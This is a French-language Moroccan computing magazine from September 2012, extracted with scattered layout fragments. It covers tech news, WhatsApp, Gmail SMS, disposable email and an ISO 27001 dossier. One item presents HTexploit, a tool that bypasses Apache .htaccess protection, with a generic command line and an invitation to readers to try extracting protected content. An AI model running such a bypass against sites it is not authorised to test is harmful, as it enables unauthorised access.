N° 04 | 20 Septembre 2012

Enrich your knowledge

INWI & GMAIL

Tera-magazine

Hack your Android Phone.

La normeISO 27001

P15

Dossier

HOW TO?

ACTIVATION DES APPELS PAR

MODEM 3G

DÉCOUVERTE DU POWERSHELL

&&LE MÉTIER DE L’AVENIR :Administrateur des systèmes

Hacking des mots de passe

suite..P35

P49

P29

P41

P17

P55

P54

2

رمز االستجابة السريع أو الرمز المربع

WHATSAPPPrem

ière revue en informatique au M

aroc

Tera-magazine

Hcking your phoneHack your Android Phone.

2

Tera-bit-magazinePremière revue en informatique au Maroc 20012.

www.teramagazine.tktera.revue@gmail.com

L’actualité informatique

TERA-MAGAZINE

Tera-Topics

Le métier d’administrateur système

La norme ISO 27001

رمز االستجابة السريع أو الرمز المربع

Sommaire

Tera-Discoveryµwhatsapp,INWI & Gmail, htexploit, Email temporaires

8-14

15-28

Tera-LabosActivation des appels par un modem 3G. 41-48

57-59

49-52

PowerShell Le nouveau shell de windows 29-34

5-7

UNE REVUE FAITES PAR DES INFORMATICIENS POUR DES INFORMATICIENS

Dossier du MoisJ

INTRO*

magazine teamSaber Hanor

BELLAJ BADR

SOULAMI RABIE

ANSAR ASMAEMustapha daouiIMADE RanjiNahass Touria ILYAS BAGUI

MAGAZINE DESIGNER: Jaffar ikhessa.

ContactMail : tera.revue@gmail.comFacebook :facebook.com/tera.revueTwitter :@terarevue

Magazine contact

EMAIL: tera.revue@gmail.com Website: www.Teramagazine.tk

>>FAITES NOUS SAVOIR CE QUE VOUS VOULEZ DANS NOTRE PROCHAIN NUMÉRO.

era-magazine est la première revue numérique, men-suelle qui s’adresse aux passionnés du monde informa-tique au Maroc. Il s’agit d’une initiative bénévole pour créer un moyen de partage des connaissances et des expériences entre informaticiens.

L’informatique étant un domaine très vague nous essayons selon les compétences disponibles, à travers ces pages, de cou-vrir les différents sujets qui peuvent intéresser les informaticiens au Maroc et les approchez des différentes zones qu’ils n’ont pas eu le temps de les découvrir ou leurs formations n’incluent pas.

Loin des slogans de marketing ou des pubs, nous vous assurons que nous tendons nos mains vers vous pour collaborer et allez en avant pour mettre en disposition du lecteur un produit de qualité. Alors, n’hésitez surtout pas, chers lecteurs à nous contacter pour vous exprimer.

Enfin, nous comptons bien sûr votre réactivité pour améliorer le contenu offert.

L’équipe de rédaction

T

PrécédentesLes éditions

3 4

L’actualité Informatique

44

what’s New? REVIEWS

UBUNTU

Canonical a décidé d’intégrer des liens publicitaires vers Ama-zon dans la prochaine version de sa distribution Linux Ubuntu 12.10, sous une forme relativement discrète. Lorsque l’utilisateur saisira des termes de recherche dans le champ de recherche uni-fiée de l’interface Ubuntu Unity, des liens vers Amazon pourront apparaître si des produits corres-pondent chez le géant de l’ecom-merce, parconsequent lorsqu’un utilisateur lance une recherche ordinaire d’un fichier ou d’une application sur son bureau, des liens Amazon vers des articles rattachés aux mot-clés saisis apparaissent avec les résultats du Launchpad.

Champ de recherche

Si vous êtes con-tre cet ad-aware, passez au MINT. Il est aussi bien que Ubuntu.

Chrome a notamment été amélioré pour prendre en charge les applica-tions de jeu en ligne.

Cette vingt-deuxième version introduit notamment l’API JavaScript Pointer Lock qui permet de mieux gérer les contrôles à la souris. Pour Google, le navi-gateur apporte désormais toute la panoplie de standards adaptés à ce type de projet : WebGL (spé-

cification d’affichage 3D), Web Audio (spatialisation du son), WebSockets (transaction bidi-rectionnelle et full-duplex sur un socket TCP)... Enfin, dans la même logique, Google indique

avoir amélioré le rendu de son navigateur pour Windows 8 et les écrans Retina.

Chrome 22Disponible en téléchargement : www.google.com/chrome

“85% des utilisateurs de Google Chrome ont déjà installé la nouvelle version”

>>Chrome 23 Chrome 23 s’attaque à la vidéo Profitant de nouvelles API et du HTML5, le prochain navigateur Google offrira des fonctions inédites liées à la vidéo. Le tout sans le moindre plug-in à installer comme le montre la première bêta de Chrome 23.

L’actualitéInformatique

5

what’s New?REVIEWS

Meqaupload

Kim Dotcom le fondateur du Megaupload, a annoncé que MegaUpload est de re-tour sous une nouvelle forme qui est prête à 90%.avec de nombreuses fonctions ad-ditionnelles, le partage, la notation, les commentaires, des infos sur l’artiste, etc. Espérons que ce service apportera quelque chose d’innovant, puisque des of-fres quasi similaires existent déjà. A moins que l’innovation soit… la gratuité ?

“de retour cette fois c’est Meg-

abox!!”

>> En Chiffres

On compte désor-mais un milliard d’utilisateurs sur Facebook en sep-tembre 2012 et un demi-milliard util-isateurs de twit-ter. En fin de cette revue nous publions des statistiques sur l’utilisation de face-book et twitter au monde arabe.

Google Docs

Google ne permettra plus d’exporter des doc-uments aux « anciens » formats que sont .doc, .xls, et .ppt. pour les ver-sion de Microsoft Office (antérieures à 2007). Cependant, google docs assure toujour l’upload des ces formats et leurs modification. Un changement qui prendra effet dès le 1er octobre.

L’actualité

La comparaison entre le nombre des utilisateurs de facebook et twitter avec les populations des grands pays met ces deux géants en position

d’avance parmi les populations mondiales. Le classe-ment est :

1-La Chine 2-l’Inde 3-facebook 4-USA 5-Indonesia 6-Brésil 7-Twitter

Google Docs : fin de l’export de documents .doc .xls et .ppt.

Facebook et twitterDeux pays sans frontières

2012www.Teramagazine.tk 6

6

“Vos docu-

ments google

Docs sont

disponible

automatique-

ment dans

votre google

Drive”

Google DOCS

Les formats supportés

B

C

onne nouvelle pour les citoyens maro-cains qui désirent obtenir ou renouve-ler leurs cartes d’identité nationale : le gouvernement marocain a lancé en

ligne le portail :http://www.cnie.ma pour connaître la procédure d’obtention ou du renouvellement de la carte CIN, ainsi que suivre l’état de sa demande. Cette bonne initiative s’inscrit dans les efforts de l’état pour moderniser les services administratifs et s’approcher du citoyen par le biais des nouvelles technologies.

Lancement du portail d’obtention de la carte d’identité national CIN.

Lent augait aute minisim

e mois a connu la découverte d’Une faille critique de plus. La vulnérabilité qui touche la version 1.7.x du JRE (Java Runtime Environment), peut être utilisée pour désactiver le SecurityManager et par conséquent le sandbox de Java pour exécuter du code arbitraire sur les systèmes vulnérables sans l’interven-

tion de l’utilisateur.

Nous vous conseillons de faire une mise à jour de votre machine virtuelle. Allez dans votre panneau de configuration sous Windows et choisissez Java ensuite faites votre update.

Encore une faille critique de securité!!

YetiTestez votre code Javascript

Tera-Magazine

7

eti est un outil de ligne de commande pour lancer les tests unitaires JavaScript dans un navigateur et communiquer les résultats sans quitter votre terminal. Il a été conçu

pour fonctionner avec des tests basés sur YUI Test.

Homepage: http://yeti.cx/GutHub:https://github.com/pankajparashar/yeti

Y

L’actualité

what’s New? REVIEWS

what’s New?REVIEWS

2012www.Teramagazine.tk 8

8

’environnement virtuel “Brow-ser in the Box”(BitBox) a été initialement développé par Sirrix pour le compte de l’Of-fice fédéral allemand pour la

sécurité de l’information pour une utili-sation par toutes les autorités fédérales. Désormais, la solution est disponible gratuitement, pour per-mettre aux utilisateurs de surfer sur Internet en toute confiance, même en utilisant les technologies Web les plus modernes et les plus vulnérables.

Sur la base d’un “Navi-gateur-in-the-Box” qui est un concept qui se base sur une machine virtuelle munie d’un sys-tème d’exploitation réduit et un naviga-teur encapsulé. Bitbox est robuste face auxMalwares qui ne peuvent pas donc pénétrer dans le système d’exploitation hôte. Les dommages potentiels dans la machine virtuelle séparée disparaîtront avec chaque démarrage du navigateur en revenant à un point de départ certi-fié. Tout cela est totalement transparent pour l’utilisateur pour une meilleure pro-tection contre les logiciels malveillants et les fuites de données.

Contrairement aux méthodes de sand-box simples fournis par les navigateurs standard, “Bitbox” isole toutes les acti-vités du navigateur complètement du système d’exploitation hôte. Seulement un seul dossier partagé au sein de l’hôte est rendu accessible à un compte utili-sateur séparé. Ce dossier stocke toutes

Le Navigateur sécurisé “Browser in the Box”

est désormais disponible GRATUITEMENT

les données de configuration persistants comme les favoris du navigateur. Ensuite, tous les fichiers téléchargés sont d’abord stockés dans ce dossier et ils ne sont pas transmis dans le dossier de téléchargement de l’utilisateur et ceci après un scan contre

les ‘malwares’.

En outre, “Bitbox” assure une protection en pro-fondeur du système de l’hôte contre les attaques provenant d’Internet, vu qu’il empêche de façon fiable les transferts de fichiers vers Internet. Ainsi, la confidentialité

des informations critiques de l’entreprise ou l’autorité n’est pas mise en péril par la simple fourniture d’accès Internet à ses employés.

“Browser in the Box” propose ainsi, un en-vironnement de surf sécurisé et sans soucis, sans aucune limitation dans le confort. L’uti-lisation coûteuse et complexe de serveurs de terminaux dédiés comme une alternative sûre pour le surf peut être évité. L’impact sur les performances est minime pour les architectures informatiques d’aujourd’hui. Pour télécharger visiter BitBox:http://download.sirrix.com/content/pages/bbdl-en.htm

L

TERA-MAGAZINEINBOX

Septembre 2012

Septembre 7

OPEN ERP Je veux débuter en ERP. Par où dois-je commen-cer? Commencez par un des tutoriels sur youtube. Je vous conseille OpenERP qui est bien docu-menté ou openBravo comme début.

septembre 12THRaspbery Pi Pourriez-vous me dire où puis-je trouver un raspbery Pi au Maroc? Je pense qu’il n’existe pas de point de vente de rasp-bery Pi au Maroc, si vous en trouvez-un, faites nous le savoir.

Septembre 7Archos J’ai une tablette Archos V2 puis-je la rooter et y installer une ROM?

Oui, bien sur. Consultez le site du constructeur Archos

et téléchargez la dernière ROM dispo-nible.

Septembre 5HNGINX J’entends parler beau-coup de NGINX pourquoi l’utiliser et est ce qu’il est utilisé au Maroc?

Comme vous le savez il existe un en-semble de serveurs dont le dominant étais apache, mais actuellement NGINX gagne du terrain rapidement et il est devenu très popu-laire vue ses per-formances surtout face à la montée en charge et sa rapi-dité. Pour les hébé-rgeurs marocains il faut contacter leurs services techniques pour savoir quels serveurs il utilisent selon mes informa-tions, apache est le choix régnant chez eux.

Septembre 19THFreelance

Je suis un webDesi-gner, je vous demande de consacrer des articles au Freelance au Maroc. le freelance au Maroc est un do-maine peu exploré. Nous comptons y consacrer un dos-sier dans nos pro-chaines éditions.

Si vous avez des demandes des

conseils ou des articles envoyez nous un E-mail à : tera.revue@gmail.com

Important

Nous présentons nous excuses pour l’absence durant le mois août, vu que la majorité de l’équipe étais en vacances. Nous reprenons notre activité avec plein d’enthousiasme et de joie pour vos of-frir notre meilleur. Nous revenons dans ce ‘Inbox’ aux messages reçus durant la période de notre inactivité. Nous présentons quelques exemples reçus.Un dernier mot; Cette revue n’est pas un travail de journalistes ou de presse, mais un travail d’informaticiens destiné à des informaticiens.

Mail Box Input

ous remercions nos lecteurs à l’étranger spécialement au ca-nada, en Tunisie et en Algérie pour leur soutien et leurs en-couragements. Bienvenue par-

mi la communauté Tera.

Special

N

Tera-Magazine

9

Tera Découverte

Des services et des nouveautés à décou-

vrir

2012www.Teramagazine.tk 10

10

WHATSAPP

Tera-discovery whatsapp

D e Depuis que l’internet et les téléphones intelligents ont commencé à envahir nos vies, de nouvelles formes de communication ont surgi : Facebook, Twit-ter, Gmail ... Désormais, un nouveau né s’ajoute à cette liste, il connaît un grand succès étroitement liée

à votre activité mobile : Il s’agit du Whatsapp. Whatsapp est un moyen qui vous permet de rester en contact avec vos amis partout dans le monde à l’aide d’un échange des messages SMS en illimité sans avoir un forfait ou recharge mobile.

Note:

Note:

L’utilisation reste gratuite pour la Première année.

prix : 0.99 $ /an

hatsApp Messenger est une mul-ti-plateforme de messagerie dis-ponible pour iPhone, BlackBerry, Android, Windows Phone, Nokia

et autre. WhatsApp Messenger utilise le même plan de données Internet que vous utilisez pour le courrier électro-nique et la navigation sur le Web, il utilise votre connexion 3G ou WiFi (si disponible) pour échanger vos SMS avec des amis et la famille. Passez du SMS à WhatsApp pour envoyer et recevoir des messages, des photos, des notes audios, et des mes-sages vidéos, en plus de la messagerie de base.

Comment utiliser WhatsAPP?

L’utilisation de WhatApp est facile. Il suffit d’installer la version adéquat dis-ponible sur le site officiel (http://www.whatsapp.com), selon votre mobile. Lancer l’application et chercher vos amis qui ont un compte whatsapp sur votre liste de contacts, c’est tout!

Pourquoi utiliser WhatsApp? Il existe un ensemble d’avantages en utilisant WhatsApp dont on cite :

• L’envoie des fichiers multimédias: Vidéo, des Images, et des notes vocales à vos amis et contacts.

• Création des groupes de chat: Pro-fitez des conversations de groupe avec vos contacts.

• Utilisation sans codes Pins ou nom d’utilisateurs: WhatsApp fonctionne juste avec votre numéro de télé-phone et s’intègre parfaitement avec votre annuaire d’adresses existant.

• Utilisation sans Login/Logout: Avec les notifications, WhatsApp est tou-jours allumé et connecté en perma-nence.

• WhatsApp enregistre vos messages hors ligne jusqu’à ce que vous les récupérer lors de l’utilisation pro-chaine application.

WhatsApp est devenu outrageuse-ment populaire en raison de son sys-tème de SMS gratuit sur Inter- net. Essayez-le.

w

2012www.Teramagazine.tk 12

12

Inwi & Gmail

Le service Gmail-SMS vous permet d’envoyer gratuitement jusqu’à 50 SMS à par-tir de votre compte Gmail vers les numéros mobiles inwi. Votre contact peut

vous répondre par SMS directement sur votre compte Gmail, en vous donnant la possibilité d’initier une conversation CHAT. Chaque réponse de votre contact vous fera gagner jusqu’à 5 SMS supplémen-taires gratuits à envoyer depuis votre compte Gmail. Vous pouvez cumuler jusqu’à 50 SMS maximum sur votre compte.

Tip!

information

Selon le forfait mobile dont vos contacts disposent, des frais d’opérateurs peuvent leur être imputés pour la réception de SMS.

1 Saisissez le nom de votre contact

dans le champ de recherche ou invitez votre ami à partici-per à un chat, puis sélectionnez Envoyer un SMS dans le menu qui s’affiche à droite du nom du contact. Si vous avez déjà ouvert une ses-sion de chat avec ce contact, cliquez sim-plement sur Options, puis sélectionnez; En-voyez un SMS (Fig1).

2Dans la boîte de dialogue, saisis-

sez un numéro de téléphone dans le champ “Envoyer des SMS à ce numé-ro”. Pour le moment, cette fonctionnalité est proposée uni-quement pour INWI.(Fig2)

3Cliquez sur Enregistrer. 4Une fenêtre de chat

s’affiche. Saisissez votre message comme à votre habitude. Appuyez sur Entrée pour envoyer le message au numéro de téléphone indiqué.

Combien ça coûte ?Les SMS envoyés du mobile vers le compte Gmail sont facturés au prix standard (1DH / SMS)

Sur le lien http://support.google.com/chat//bin/answer.y?hl=fr&answer=164876&rd=1Google indique que INWI est l’opérateur unique qui bénéficie de ce service, en attendant que les deux autres font de même.

How To DO

Tera-Magazine

13

INWI & GMAIL restez connectés & chatez en SMS

Fig.1

Fig.2

Samsung Galaxy SIII

Caractéristiques:

• Dimensions : 136.6x70.6x8.6 mm• Poids : 133 g• Autonomie : 900h(2G)/750h(3G)

en mode veille et 1300min(2G)/650min(3G) en communication

• Bi-bande Tri-bande • Batterie : Standard, Li-Ion 2 100

mAh• processeur : Quad-Core de 1.4GHz

Chez IAMIAM Pack GSM :• 12 mois : 6549 (DH TTC)• 24 mois (Particuliers): 5949 (DH TTC)

Chez Meditel :

Engagement 24 mois • Offre Smartphones 2h30:3990Dh • Offre Smartphones 4h30 : 2990 Dh

>>Offres Samsung S3

Ecran• 4.8’’,1280x720 pixels,

16M Couleurs. • HD Super Amoled

Caméra• 8 Mega pixels

CaméraCaméra orientée vers l’avant

OS• Android 4.0(ICS)

LED lumineux

Boutton d’acueil

Note

Note

Note

14

Vous l’aurez un jour !!

70.6mm

E-MAILSTEMPORAIRES

Par Imad belhadi

ous voulez s’inscrire dans un nouveau site ou un service qui demande votre mail et vous craignez que cette inscription vous causera un flux de

SPAM (mail indésirable) alors la solution est les mails temporaires ou jetables.

Comme leurs noms l’indiquent ces E-mails sont pour une utilisation de courte durée. Les messages s’auto-détruisent au bout de quelques minutes ou jours, ou après la durée que vous avez précisée à la création de votre compte temporaire (de quelques heures à quelques mois).

Le plus important dans ces E-mails, c’est qu’ils ne demandent aucune inscrip-tion. Vous inventez le nom d’utilisateur et hop! vous possédez une boite mail par exemple je vous donne “quelquechose_teramag@yopmail.com” pour m’envoyer un Email, Je n’ai pas besoin de créer ce compte chez yopmail mais j’accède direc-tement en fournissant seulement le pré-fixe “quelquechose_teramag”. Pour limiter l’accès à ce compte mai , pour qu’il ne soit accessible que par vous même utilisez un nom très difficile à retenir sinon take it easy.

Votre Arme contre les SPAMSPLus besoin de créer de nouvelles boites Mails

v

Voici donc une liste de sites qui proposent ce service, ce sont tout simplement les plus fiables et les plus connus ...• Jetable.org• Yopmail.com• mytrashmail.com• Brefmail.com• Mail-Temporaire.com• LinkToMail.net• www.0-Mail.com• anonymbox.com

Fournisseurs des mails-temporaires

Tera-Magazine

15

Discovery Tera

Fournisseurs des mails-temporaires

D

la protection par .htaccess EST ELLE VULNÉRABLE?

eux chercheurs en sécurité ont pré-senté à l’occasion de la conférence Black Hat de Las Vegas un outil nom-mé HTexploit destiné à contourner

la protection .htaccess des serveurs web Apache. la nouvelle a de quoi alerter vos services de veille : il est en effet très pro-bable qu’un grand nombre de vos interfaces d’administration soient protégées par htac-cess (sites web, systèmes de publication, équipements réseau dotés d’une interface web, etc…). Cependant, nous observons que HTexploit n’est pas encore optimisé au point d’en faire un outil de piratage clés-en-main (ce que les auteurs précisent d’ailleurs sans honte). Si vous parvenez à le faire fonction-ner, et contourner ainsi la protection .htac-cess d’un répertoire afin d’en extraire du contenu, n’hésitez pas à nous contacter !

>>HTexploit:

HTExploit est un outil open-source écrit en Python qui exploite une faiblesse dans la façon dont le fichiers .Htaccess peut être configuré pour protéger un répertoire web avec un processus d’authentification. cet

outil serait donc capable de lister le contenu d’un répertoire protégé de cette façon, sans passer par le processus d’authentification.

L’utilisation de HTexploit:L’utilisation est simple il suffit de Télécharger Htexploit et le décompresser, ensuite taper :

sudo ‘chemin du fichier’ -u ‘adresse web à tester’ et lancer votre test. En résultat, HTex-ploit affirme ou non si le dossier web est vulnérable, mais ne croyez pas toujours ses

conclusions.

Les fichiers .htaccess sont des fichiers de configuration d’Apache, permettant de définir des règles dans un répertoire et dans tous ses sous-répertoires (qui n’ont pas de tel fichier à l’intérieur). On peut les utiliser pour protéger un répertoire par mot de passe, ou pour chan-ger le nom ou l’extension de la page index, ou encore pour interdire l’accès au répertoire. Intérêt des fichiers htaccess.

Les fichiers .htaccess peuvent être utilisés dans n’importe quel répertoire virtuel ou sous-répertoire.

Les principales raisons d’utilisation des fichiers .htaccess sont : •Gérerl’accèsàcertainsfichiers.•Ajouterunmime-type.•Protégerl’accèsàunrépertoireparunmotdepasse. •Protégerl’accèsàunfichierparunmotdepasse. •Définirdespagesd’erreurspersonnalisées.

2012www.Teramagazine.tk 16

16

.htaccess c’est quoi?

Dossier Tera

ISO 27001 PrésentationMéthode d’implémentationAudit ...

Lest’s TalkAbout

Dans une première, Au Maroc, nous vous présentons la norme ISO 270001. Conscient de son importance nous vous proposons un dossier complet pour étudier cette Norme peu connu au Maroc et dont la documentation gratuite est assez rare.

ISO 27001 Un label de qualité ou une protection de votre système d’information ?

Tera-Magazine

15

IL est encore peu de temps, le Maroc était l’un des cancres de

la norme ISO 27001. Il faut dire que l’idée d’un cadre de gestion de la sécurité, avec tout le formalisme que cela implique, ne pas-sionne pas forcément les acteurs marocains dans le domaine des SI.

ISO 27001 est une nouvelle norme pour mettre en place un système de manage-ment de la sécurité de l’information. Cette norme ISO 27001 et ses cousines (27002 et 27005) ont depuis leurs apparitions gag-né du terrain et de la reconnaissance. En rai-

son de leurs qualités et leurs performances.

Encore une norme, vous me direz! Hé oui, on n’arrête pas le progrès. Vous avez déjà eu un problème informatique, la perte de données due à la défaillance de votre disque dur ou des intrusions à votre sys-tème d’information ? À mon avis, toutes les organisations ont déjà subi de tels inconvé-nients.

En outre, pr-esque tout dans le mode des affaires d’aujourd’hui est basé sur l’information. Avoir des informations cor-rectes au bon mo-ment est souvent la source d’avantage

ISO 27001 une norme pour la sécurité de l’information

DossierTera

Dans une première, Au Maroc, nous vous présentons la norme ISO 270001. Conscient de son importance nous vous proposons un dossier complet pour étudier cette Norme peu connu au Maroc et dont la documentation gratuite est assez rare.

16

16

Dossier Tera

LES SySTèMES DE MANAgEMENT

concurrentiel. Par con- séquent, Les entre- prises dépensent une grande partie de leurs budgets à l’acquisition de l’information et de gestion. Nous pouvons dire que l’information est le plus précieux “actif” qu’une entreprise peut avoir aujourd’hui.

Dans le cas où vous souhaitez gérer et at- ténuer les risques liés au travail avec vos in- formations et vos don- nées, vous avez de nom- breuses options. Une des options consiste à mettre en œuvre un système pour la gestion de la sé- curité des informations, soi-disant sécurité de l’information de gestion du système (SMSI).

Une fois les processus sont en place, vous pou- vez avoir votre système de gestion de sécurité de l’information et de vos processus certifiés. La norme ISO 27001 vise donc la mise en place d’un système pour réduire vos risques à cet égard.

Avoir une informa- tion certifiée ISO 27001 Système de gestion de la sécurité vous donne un grand avantage dans le traitement de vos cli- ents et partenaires, car il vous rend plus crédible et digne de confiance. Cela peut ouvrir la porte pour échange mutuel de

données et l’échange d’informations avec vos clients, partenaires, fournisseurs.

ISO 27001 est à la fois un label de qualité et une protection de votre système d’information. L’étude de cette norme demande des efforts et de la bonne documenta- tion et surtout de bonnes connaissances dans le domaine informatique.

À travers ce dossier, je vais essayer d’introduire cette norme et de couvrir ses aspects importants (les avantages, limites ...).

Point de Départ :

Avant d’entamer notre parcours, il faut avoir des connaissances dans le domaine informatique et surtout en sécurité infor- matique. Il faut connaitre un ensemble de défini- tions telles que : menace, risque et vulnérabilité qui sont des notions de base.

Académiquement on peut les définir comme suit :

• Menace : Une attaque possible d’un indi- vidu ou d’un élément naturel sur des biens (ici, des informations) entraînant des con- séquences potenti- elles négatives.

• Vulnérabilité : Car- actéristique d’une entité qui peut con- stituer une faiblesse ou une faille au re- gard de la sécurité de l’information.

• Risque : Combinaison d’une menace et des pertes qu’elle peut engendrer. On aura aussi besoin de définir qu’est-ce que c’est un système de manage- ment et un SMSI.

Définit par l’organisation internationale de normalisa- tion ISO dans la norme IS0 9000 et plus précisément dans la rubrique intitulée « Système de management », comme un système permet- tant : • D’établir une politique. • D’établir des objectifs. • D’atteindre ces objectifs. Plus concrètement, un sys- tème de management peut être vu comme un ensem- ble de mesures techniques et organisationnelles visant un objectif.

ISO 27001 est à la fois un label de qualité et une pro- tection de votre système d’information.

Tera-Magazine

17

La

Référentiel SMSI

ISO 9001 Qualité

ISO 14001 Environnement

ISO 27001 Sécur ité de l’information

ISO 20000 Services informatiques

OHSAS 18001

Santé /Sé curité du personnel

ISO 22000 Sécurité alimentaire

la norme ISO 27001

norme ISO/IEC 27001:2005 est une norme internatio-nale de système de gestion de la sécu-

rité de l’information. Elle a été publiée en 2005 par l’ISO sous le titre : Tech-nologies de l’information - Techniques de sécurité - Systèmes de gestion de sécurité de l’information - Exigences.

L’ISO 27001 régit la conception, la mise en œuvre, le suivi, la mainte-nance, l’amélioration et la certification du système de management de la sécurité de l’information (SMSI). Il ne prescrit pas les contrôles spécifiques de sécurité des informa-tions, mais s’arrête au niveau du système de ges-tion.

ISO 27001 n’est pas une loi impérative, il est plus d’une collection de «meil-leures pratiques» et «con-naissance pratique éprou-vée de l’industrie» liés à ISMS.

ISO 27001 est la norme officielle avec laquelle les organisations peuvent demander une certifica-tion indépendante de leur (SMSI).

à qui s’adresse cette norme?

La norme couvre tous les types d’organisation (à l’occurrence, des en-treprise commerciales, des organismes gouver-nementaux et organismes sans but lucratif) ainsi que toutes tailles (PME/PMI) à partir des micros-entre-prises aux grandes multi-nationales.

Selon JTC1/SC27, le responsable de l’ISO / CEI comité pour ISO27000 et les normes connex-es , la norme ISO / CEI 27001 est destiné à être adapté à différents types d’utilisation, y compris:

• Utilisation au sein des organisations à for-muler des exigences de sécurité et les objectifs.• Utilisation au sein des organisations comme un moyen de s’assurer que les ris-ques de sécurité ont des coûts gérés effi-cacement.

18

18

Un SMSI est un exemple de système de management. En se basant sur la définition du système de management, un SMSI peut se définir par un ensemble des ressources en matière de la sécurité de l’information permettant à une organisation d’établir une politique et des objectifs, ainsi d’appliquer cette politique et atteindre les objectifs et une fois ces objectifs sont atteints, il faut les contrôler et les su-perviser.

SMSI

Principaux systèmes de management Les systèmes de management s’appliquent non seulement au domaine de la sécurité de l’information, mais aussi leur implémentation s’effectue dans plusieurs domaines tels que la qualité, l’Environnement, les services informatiques, la sécu-rité alimentaire ou encore celui de la santé. A chaque do-maine correspond un référenti-el précis qui est normalisé par l’ISO (Organisation internatio-nale de normalisation).La nor-malisation des référentiels n’est pas restreinte à l’organisation internationale de normalisation ISO. Le tableau ci-dessous ré-sume les principaux systèmes de management et leurs ré-férentiels :

Dossier Tera

• Utilisation au sein des organisa-tions afin d’assurer la conformité aux lois et règlements;• Utilisation sein d’une organisa-tion comme un cadre de processus pour la mise en œuvre et la gestion des contrôles pour s’assurer que les objectifs de sécurité spécifiques d’une organisation sont respectées;

structure et contenu de la norme ISO/IEC 27001

La norme 27001 comporte 9 chapi-tres dont 5 (les chapitres 4 à 8) doivent obligatoirement être respectés pour répondre à cette norme et obtenir une certification.

Le chapitre 4 est au cœur de la norme et il est divisé en plusieurs par-ties correspondant aux 4 phases du PDCA. Il détermine la mise en place du SMSI, son implémentation et son ex-ploitation, le contrôle du SMSI et son amélioration.

Ci-dessous la présentation des neufs chapitres de l’ISO / IEC 27001:2005 :

Introduction - la norme utilise une approche par processus.

1- Domaine d’application : il spécifie les exigences génériques appropriées pour les ISMSI des organisations de tout type, taille ou nature.

2- Références normatives : seule-ment la norme ISO / IEC 27002:2005 qui est considérée comme absolument essentielle à l’utilisation de l’ISO 27001.

3- Termes et définitions : un bref glossaire formalisée, qui sera bientôt remplacée par la norme ISO / CEI 27000.

4- Le SMSI : son fonctionnement est basé sur un modèle cyclique en 4 étapes appelé « PDCA » c’est-à-dire Plan (planifier), Do (développer), Check (contrôler ou vérifier), Act (a juster).

5- Les engagements et respon-sabilités de la direction : la direction doit démontrer leur engagement à l’ISMS, principalement par l’allocation de ressources suffisantes pour mettre en œuvre et exploiter elle.

6- Audits internes du SMSI : l’organisme doit effectuer périodique-ment des audits internes afin d’assurer que le SMSI intègre des contrôles adéquats qui fonctionnent de manière efficace.

7- Réexamen du SMSI par la di-rection : la direction doit examiner la pertinence, l’adéquation et l’efficacité du SMSI au moins une fois par an, en évaluant les possibilités d’amélioration et de la nécessité de changements.

8- Améliorations du SMSI : l’organisme doit améliorer en perma-nence le SMSI en évaluant et le cas échéant d’apporter des modifica-tions afin d’assurer sa pertinence et l’efficacité, la non-conformité face (non-) et, si possible la prévention des problèmes récurrents.

Annexe A : Les objectifs de contrôle et les contrôles - un peu plus en fait que la liste des titres des sections de contrôle de la norme ISO / CEI 27002, vers le bas pour le deuxième niveau de la numérotation (par exemple 9.1, 9.2), 133 au total.

Annexe B : Principes de l’OCDE et de la présente Norme internationale - une

Tera-Magazine

19

table brièvement montrant quelles parties de cette norme satisfaient aux 7 principes clés énoncés dans les lig-nes directrices de l’OCDE régissant la sécurité des systèmes et réseaux d’information.

Annexe C : Correspondance entre l’ISO 9001:2000, ISO 14001:2004 et la présente Norme internationale - le standard partage la même struc-ture de base des autres standards de systèmes de gestion, ce qui signifie qu’une organisation qui veut mettre en œuvre n’importe quel standard doit être familiarisée avec des concepts tels que PDCA, dossiers et audit.

Les avantages de L’ISO 27001

Cette norme présente de nombreux

avantages :

•Unedescriptionpratiqueetdé-taillée de la mise en œuvre des objec-tifs et mesures de sécurité.

•Unauditrégulierquipermetlesuivi entre les risques initialement identifiés, les

mesures prises et les risques nou-veaux ou mis à jour, afin de mesurer l’efficacité des mesures prises.

•Processusd’améliorationcontinuede la sécurité, donc le niveau de sécu-rité a plutôt tendance à croître.

•Meilleuremaîtrisedesrisques•Diminutiondel’usagedesmesures

de sécurité qui ne servent pas.•Unecertificationquiaméliorela

confiance avec les parties prenantes.•Homogénéisation:c’estunré-

férentiel international. Cela facilite les échanges,surtout pour les entreprises qui possèdent plusieurs sites.

•Processussimpleetpeucoûteux:réduction des coûts grâce à la diminu-

tion d’usage de mesures de sécurité inutiles et à la mutualisation des audits (baisse du nombre et de la durée des audits quand on obtient la certifica-tion).

•Lanormefournitdesindicateursclairs et fiables ainsi que des éléments de pilotage financier aux directions générales.

•Lanormepermetd’identifierplusefficacement les risques et les coûts associés.

Les Limites

Comme toute norme l’ISO 27001 a ses limites d’application :

• Faible expérience des organ-ismes d’accréditation par rap-port aux spécificités des en-jeux en sécurité des systèmes d’information.

• Relations commerciales prépon-dérantes (achat de certifica-tion, de conseil, de produits, de services), ce qui conduit à une dévalorisation du processus d’accréditation.

• La durée des audits est courte.• Mélange des genres : les sociétés

de conseil sont également des organismes de certification et vis-versa.

• La définition et la mise en place d’une méthodologie sont des tâches lourdes.

• Les normes informatiques ne réduisent pas le risque en matière de piratage et de vols d’informations confidentielles.

• Les intervenants effectuant du piratage ne respectent pas les règles établies et cherchent sys-tématiquement à les contourner

• Les normes sont inopérantes dans ce domaine.

20

20

Dossier Tera

La mise en place du SMSI

Dans cette partie, on va mettre en relief les étapes à suivre pour la mise en place d’un SMSI, les principales dif-ficultés rencontrées ainsi que les pièg-es à éviter.

Les intervenants

Le chef de projet de SMSI doit rem-plir certains critères à l’occurrence :

• Comprendre les points incon-tournables pour la mise en place d’un système de management

• Etre en mesure de trancher les questions relatives à la sécurité

• Avoir reçu une formation certifi-ante ( la formation implémenta-tion iso 27001 et la formation iso 27001 Lead Auditor) Il faut noter que ces formations sont des critères nécessaires et non suf-fisants.

Le déploiement du projet SMSI ex-ige à son chef de communiquer avec trois catégories de ressources hu-maines à savoir :

• La direction générale : le chef de projet se charge d’évaluer, avec préci-sion, les coûts humains et financiers de chaque aspect du projet comme il doit savoir tirer et présenter les apports du SMSI.

•Les techniciens : le chef de pro-jet doit avoir un background technique assez fort afin

de pouvoir communiquer avec les techniciens comme il doit mettre en exergue la contribution des techniciens dans la mise en œuvre de SMSI.

• Les utilisateurs : le chef de projet doit sensibiliser cette population des apports de SMSI ainsi de l’amélioration continue obtenue.

Les méthodes de mise en place du SMSI

